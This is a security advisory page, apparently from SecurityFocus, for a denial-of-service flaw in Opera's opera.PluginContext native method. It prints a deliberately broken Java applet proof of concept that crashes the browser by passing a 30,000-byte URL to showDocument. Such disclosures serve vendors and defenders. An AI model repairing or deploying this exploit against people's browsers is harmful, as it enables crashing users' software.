• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Opera opera.PluginContext Native Method Denial Of Service Vulnerability

The following proof-of-concept was provided:

//Marc Schoenefeld 1/13/2003, www.illegalaccess.org
//not runnable, a little crippled, there are couple of obvious syntax errors
to avoid script-kidding

...
import opera.PluginContext; // !! import the vulnerable class
...

public class OperaCall2 extends App1et
{
- -
- - public OperaCall2()
- - {
- - }
- -
- - public void paint(Graphics g)
- - {
- - PluginContext plugincontext = new PluginContext(l);
- - try
- - {
- - plugincontext.showDocument(new URL("http://xxx.xxx" + new
String(new byte[30000])));
- - }
- - catch(Exception exception)
- - {
- - exception.printStackTrace();
- - }
- - }
}